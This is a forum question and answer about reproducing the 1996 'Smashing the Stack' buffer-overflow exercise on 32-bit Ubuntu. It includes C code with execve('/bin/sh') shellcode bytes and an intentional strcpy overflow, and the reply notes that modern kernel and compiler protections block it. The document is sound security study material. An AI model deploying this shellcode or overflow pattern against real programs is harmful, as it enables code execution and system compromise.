Using strcpy & buffer overflow to execute shell code

I've been going through "Smashing the stack for fun and profit" and am having issues executing shell code through a buffer overflow.

Running on Linux, Ubuntu 32-bit via VirtualBox, gcc compiler with -fno-stack-protector -ggdb -g tags.

My code is identical to the reading and I don't understand why it's not working. I get a segmentation fault. When I use gdb to debug it says "0x08048268 in ??" which I know means it can't find the address in the scope. I don't understand why it shouldn't be able to.

I am compiling with stack guard off as well.

    #include <string.h>   /* needed for strlen() and strcpy() */

    /* Shellcode bytes as given in the article; kept unchanged. */
    char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
                       "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
                       "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    char large_string[128];

    int main(void) {
        char buffer[96];
        int i;
        long *long_ptr = (long *) large_string;

        /* Fill all 128 bytes (32 x 4-byte longs on 32-bit) with the address of buffer. */
        for (i = 0; i < 32; i++)
            *(long_ptr + i) = (int) buffer;

        /* Place the shellcode at the start of large_string, leaving the
           remaining bytes as copies of buffer's address. */
        for (i = 0; i < strlen(shellcode); i++)
            large_string[i] = shellcode[i];
        large_string[127] = '\0';

        /* 127 bytes copied into a 96-byte buffer: this is the intended overflow. */
        strcpy(buffer, large_string);
        return 0;
    }

That's an old article, but I've cited it too. The problem is that your code is "identical to the reading." Those aren't magic numbers from a script. Pay close attention to how Aleph One determined which values to smash the stack with for that program.

And keep in mind that the article is from 1996, and the kernel and GCC devs have read it too.
